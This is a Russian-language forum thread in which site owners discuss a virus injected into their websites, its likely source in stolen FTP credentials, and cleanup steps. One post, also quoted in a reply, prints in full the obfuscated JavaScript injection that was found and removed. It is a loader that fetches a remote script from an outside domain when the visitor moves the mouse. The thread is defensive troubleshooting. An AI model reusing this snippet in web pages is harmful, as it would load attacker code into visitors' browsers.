Перейти к содержанию
rusisha

[Решено] Дырка в коде?

Рекомендуемые сообщения

Доброго времени суток уважаемые!

Вот ПРОБЛЕМА

Гугл говорит ВИРУС

что делать не знаю...

p.s. прошу прошение за неинформативность топика.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

почистить можно.

но сначала надо просканить свой комп и сменить пароли доступа к хосту.

также есть вероятность, что поимели "соседний сайт" (или вобще весь сервер) однако проверить это не всегда просто.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

проблему решили, огромная благодарность "afwollis" за поддержку.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А каким образом решили? Может, не дай Бог, пригодится кому-нить... :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Походу Ющенко помог избавиться, как ни как менеджер на сайте :).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

:lol: Таки да!

Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

:lol: Таки да!

Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.

Не предыдущем хостере было что взломали самого хостера, вернее один из его серверов и через него "завирусили" все сайты. Это было последней каплей.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.

В 99% случаев это скомпрометированный доступ по FTP. При этом в 99,99% случаев пишут про дырки...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

monax, в заголовке ведь четко написано - "боремся с вирусами".

Ни о каких "дырках в скрипте" речи нет.

Подробно разбирать проблему не стали, хотя известна дата заражения файлов.

Пострадали как всегда индексные файлы, доступные для записи.

Кроме них заражению подверглись header.*, footer.* и большая часть *.js.

Гадость была почищена спец.скриптом, запущенным через cron.

В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива.

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

В 99% случаев это скомпрометированный доступ по FTP.

У меня когда-то тоже подсел вирус на один из моих сайтов. Помню, кипишнул я тогда нипадецки. Первая мысль была - "дырка в коде". Но потом поспрашивал знающих людей и согласился, что, вероятнее всего, таки стырили доступ по ftp. Не факт, что с моего компа, т.к. достаточно трепетно отношусь к безопасности (антивирус, файрвол, антитроян и т.п. :rolleyes: ), но доступ был прописан в Дримвивере ещё на двух других компах. Оттуда, скорее всего, и стянули...

Короче, с тех пор ftp вообще не пользуюсь. Даже заблокировал доступ по ftp на сервере. :lol: И пароли ни на каких других компах не оставляю.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

monax, в заголовке ведь четко написано - "боремся с вирусами".

Ни о каких "дырках в скрипте" речи нет.

Подробно разбирать проблему не стали, хотя известна дата заражения файлов.

Пострадали как всегда индексные файлы, доступные для записи.

Кроме них заражению подверглись header.*, footer.* и большая часть *.js.

Гадость была почищена спец.скриптом, запущенным через cron.

В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива.

Тоже эта гадость вылезла, причем на двух хостингах сразу (оба хостинга - разные, но у одного хостера)

Если не сложно - поделитесь скриптом для Cron, а то вылавливать код в файлах запарился (((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?

Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).

Затем скачал программу http://www.infortech.ru/prj/open/tr/

Сделал автозамену текста

<script type="text/javascript">

var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();

</script>

заменил на пробел ))) во всех файлах.

Все, проблема ушла.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Как уже писали, это скомпрометирован доступ по FTP. Не пользуйтесь менеджерами, которые хранят пароли в открытом виде, а еще лучше использовать защищенный протокол.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).

Затем скачал программу http://www.infortech.ru/prj/open/tr/

Сделал автозамену текста

<script type="text/javascript">

var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();

</script>

заменил на пробел ))) во всех файлах.

Все, проблема ушла.

Не помогло...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Таким способом нашел лишь пять файлов index.html в разных папках. Антивирусом вообще ничего не нашел. Яндекс-вебмастер, например, указывает, что эта страница заражена. http://www.1catalog1.ru/index.php?route=product%2Fproduct&product_id=240 Скачал только ее, внимательно просмотрел код - ничего не нашел. Как можно еще попытаться решить проблему с заражением?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Sed, тему читайте полностью, а не последние сообщения.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да все сделал как написано. Сменил пароль, просканил (почистил) комп, почистил файлы - не помогает...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

значит не все файлы почистил

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ищу поциентов для комплексных обследований, вынесений диагнозов и разработки универсальной сыворотки.

возможны побочные эффекты, такие, как:

- впадение в кому;

- временная инвалидность;

- ...

не исключена возможность летальных исходов...

родина вас не забудет.

= = =

обращаться в ЛС только при наличии больного поциента.

Изменено пользователем afwollis

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.